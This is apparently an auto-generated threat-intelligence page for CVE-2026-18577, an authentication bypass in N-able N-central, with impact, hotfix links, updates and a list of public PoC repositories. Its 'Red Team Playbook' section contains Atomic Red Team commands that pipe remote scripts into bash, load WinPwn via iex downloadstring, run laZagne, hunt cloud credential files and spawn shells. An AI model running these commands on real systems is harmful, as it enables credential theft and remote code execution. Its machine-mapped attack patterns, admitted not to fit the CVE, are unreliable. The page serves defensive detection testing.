CVE-2026-18577
Overview
This vulnerability is an authentication bypass stemming from an incomplete patch applied to N-able N-central versions through 2026.3.1. The root cause lies in improper validation of authentication tokens within the access control mechanism, specifically affecting the authentication workflow component. The flaw allows bypassing normal authentication checks due to insufficient verification logic in the session validation process.
Vulnerability Description
An incomplete patch for CVE-2026-18556 allows for authentication bypass and account takeover in N-central Versions through 2026.3.1
Impact
An attacker can gain unauthorized access to N-able N-central management consoles without valid credentials, enabling full account takeover. This unauthorized access allows the attacker to view, modify, or delete managed device configurations and potentially escalate privileges within the environment. Exploitation requires no authentication or user interaction, making it feasible for remote attackers to compromise critical infrastructure management systems, leading to significant operational disruption and data compromise.
Solution
N-able has released a hotfix for N-central 2026.3.1, detailed in the official release notes at https://documentation.n-able.com/N-central/Release_Notes/GA/Content/N-central_2026.3_HF1_Release_Notes.htm. Users should apply the 2026.3 Hotfix 1 immediately to address the authentication bypass. Additional mitigation guidance is available at https://status.n-able.com/2026/08/02/n-central-2026-3-hotfix-1-mitigation-for-cve-2026-18577/. Follow vendor instructions precisely to ensure complete remediation of the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question stems from an incomplete patch that was intended to address a prior security flaw in a widely used network management software. This oversight allows for an authentication bypass, which can lead to unauthorized access and account takeover. The underlying issue arises from the software's failure to properly validate user credentials under certain conditions, enabling an attacker to exploit this weakness. Specifically, the flaw can be triggered by manipulating session tokens or exploiting weaknesses in the authentication workflow, thereby granting an attacker the ability to impersonate legitimate users without the need for valid credentials.
Attack vectors for this vulnerability are diverse and can be executed through various means. An attacker may leverage social engineering techniques to trick users into revealing sensitive information or may employ automated scripts to exploit the authentication bypass. Additionally, if the software is exposed to the internet, an attacker could conduct remote exploitation, targeting systems that have not been updated with the latest patches. Scenarios could involve an attacker gaining administrative access to the network management system, allowing them to manipulate configurations, access sensitive data, or even deploy malware across the network. The ease of exploitation, coupled with the potential for significant access, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability can be severe, especially for organizations relying on the affected network management software for critical operations. An attacker successfully exploiting this flaw could lead to unauthorized access to sensitive data, including customer information, network configurations, and proprietary business processes. The ramifications could extend beyond immediate data loss; organizations may face reputational damage, regulatory penalties, and financial losses due to operational disruptions. Furthermore, the risk of data breaches could lead to long-term consequences, including loss of customer trust and potential legal liabilities.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching software is crucial, as it ensures that known vulnerabilities are addressed promptly. Organizations should also conduct routine security assessments and penetration testing to identify potential weaknesses in their systems. Implementing robust access controls, such as multi-factor authentication, can significantly reduce the risk of unauthorized access. Additionally, monitoring user activity and employing anomaly detection systems can help identify suspicious behavior indicative of an attempted exploitation of the vulnerability.
In conclusion, the authentication bypass vulnerability presents a significant threat to organizations utilizing the affected network management software. The combination of easy exploitation and the potential for severe consequences underscores the importance of proactive security measures. By prioritizing timely patch management, enhancing access controls, and maintaining vigilant monitoring practices, organizations can better protect themselves against the risks posed by this and similar vulnerabilities. The evolving threat landscape necessitates a commitment to continuous improvement in cybersecurity practices to safeguard sensitive information and maintain operational integrity.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-18577, indicating increased adversary interest and potential exploitation attempts targeting N-able N-central versions through 2026.3.1. This vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its elevated priority for federal agencies and critical infrastructure entities, signaling broader recognition of its risk. Although no new exploit techniques or ransomware affiliations have surfaced, the uptick in telemetry and the corresponding rise in the Exploit Prediction Scoring System (EPSS) score reflect a growing likelihood of exploitation in the wild. For defenders, this development intensifies the urgency to monitor for indicators of compromise and reassess risk postures surrounding affected systems. The evolving exploitation landscape, combined with formal government prioritization, elevates the threat level from high to a more imminent concern, warranting heightened vigilance despite the absence of confirmed active exploit campaigns.
Update 2 — August 14, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-18577, characterized by a significant surge in telemetry detections and the emergence of new proof-of-concept exploits publicly available on GitHub. This expansion of the exploit landscape indicates that threat actors are increasingly equipped to bypass the incomplete patch, raising the probability of successful authentication bypass and account takeover attempts in affected N-able N-central environments. The EPSS score’s substantial increase to the 0.90th percentile further underscores the elevated risk of exploitation in operational settings. Although no direct ransomware affiliations have been confirmed, the availability of defensive and offensive tooling suggests that adversaries could leverage this vulnerability as a foothold for subsequent malicious activity. Consequently, the threat level associated with CVE-2026-18577 has intensified from a theoretical high risk to a more imminent and actionable concern, necessitating heightened monitoring and prioritization by defenders.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
N-Able | N-Central | All |
cpe:2.3:a:n-able:n-central:*:*:*:*:*:*:*:*
|
|
|
N-Able | N-Central | 2026.3 |
cpe:2.3:a:n-able:n-central:2026.3:-:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Yash-Dalvee/stormencryptor-ncentral-defense
Defensive security research, SIEM rules, and remediation tools for CVE-2026-18577 & StormEncryptor ransomware.
|
Yash-Dalvee | 0 | 0 | 2026-08-11 | View |
|
HORKimhab/CVE-2026-18577
CVE-2026-18577 - Draft
|
HORKimhab | 0 | 0 | 2026-08-04 | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High | |
| CAPEC-127 | Directory Indexing |
30%
|
High | Medium |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-18577 |
| documentation.n-able.com |
GitHub CVE
|
https://documentation.n-able.com/N-central/Release_Notes/GA/Content/N-central_2026.3_HF1_Release_Notes.htm |
| status.n-able.com |
GitHub CVE
|
https://status.n-able.com/2026/08/02/n-central-2026-3-hotfix-1-mitigation-for-cve-2026-18577/ |
| cve.org |
GitHub CVE
|
https://www.cve.org/CVERecord?id=CVE-2026-18556 |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-18577 |
| n-able.com |
NVD API
Vendor Advisory
|
https://www.n-able.com/blog/n-central-security-update-august-2-2026 |